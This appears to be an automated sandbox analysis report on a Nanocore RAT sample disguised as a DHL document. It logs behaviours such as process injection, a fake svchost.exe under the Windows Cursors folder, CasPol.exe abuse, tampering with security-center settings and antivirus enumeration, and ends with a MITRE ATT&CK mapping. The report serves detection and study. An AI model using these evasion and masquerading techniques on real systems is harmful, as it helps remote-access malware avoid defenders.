Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Queries volume information: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe VolumeInformation
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Queries volume information: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe VolumeInformation
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe

Code function: 12_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,

12_2_0040A272

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)

Show sources

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Source: svchost.exe, 00000009.00000002.512125264.0000015976241000.00000004.00000001.sdmp	Binary or memory string: "@\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe
Source: svchost.exe, 00000009.00000002.512891423.0000015976302000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 0000001D.00000002.529223776.0000000002D91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.504221137.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.533736388.0000000003DD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.543251582.00000000047D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.544943741.000000000430F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.540084949.0000000005AE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.544960546.00000000047D2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6560, type: MEMORY
Source: Yara match	File source: 28.2.svchost.exe.4806e98.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.3ddff94.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.5ae0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.3ddb15e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.3ddff94.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.3de45bd.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.svchost.exe.4341dc8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.5ae4629.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.svchost.exe.4341dc8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.svchost.exe.4806e98.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.5ae0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL_document1102202068090891.exe.48057c0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL_document1102202068090891.exe.48057c0.7.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: DHL_document1102202068090891.exe, 00000000.00000002.544960546.00000000047D2000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: svchost.exe, 00000011.00000002.544943741.000000000430F000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 0000001D.00000002.529223776.0000000002D91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.504221137.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.533736388.0000000003DD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.543251582.00000000047D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.544943741.000000000430F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.540084949.0000000005AE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.544960546.00000000047D2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6560, type: MEMORY
Source: Yara match	File source: 28.2.svchost.exe.4806e98.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.3ddff94.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.5ae0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.3ddb15e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.3ddff94.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.3de45bd.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.svchost.exe.4341dc8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.5ae4629.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.svchost.exe.4341dc8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.svchost.exe.4806e98.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.5ae0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL_document1102202068090891.exe.48057c0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL_document1102202068090891.exe.48057c0.7.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	DLL Side-Loading1	Exploitation for Privilege Escalation1	Disable or Modify Tools21	Input Capture1	File and Directory Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Application Shimming1	DLL Side-Loading1	Deobfuscate/Decode Files or Information11	LSASS Memory	System Information Discovery23	Remote Desktop Protocol	Input Capture1	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter1	Windows Service1	Application Shimming1	Obfuscated Files or Information2	Security Account Manager	Query Registry1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Service Execution2	Registry Run Keys / Startup Folder11	Access Token Manipulation1	Software Packing11	NTDS	Security Software Discovery351	Distributed Component Object Model	Input Capture	Scheduled Transfer	Remote Access Software1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Windows Service1	Timestomp1	LSA Secrets	Virtualization/Sandbox Evasion18	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Process Injection312	DLL Side-Loading1	Cached Domain Credentials	Process Discovery3	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol12	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Registry Run Keys / Startup Folder11	Masquerading221	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion18	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
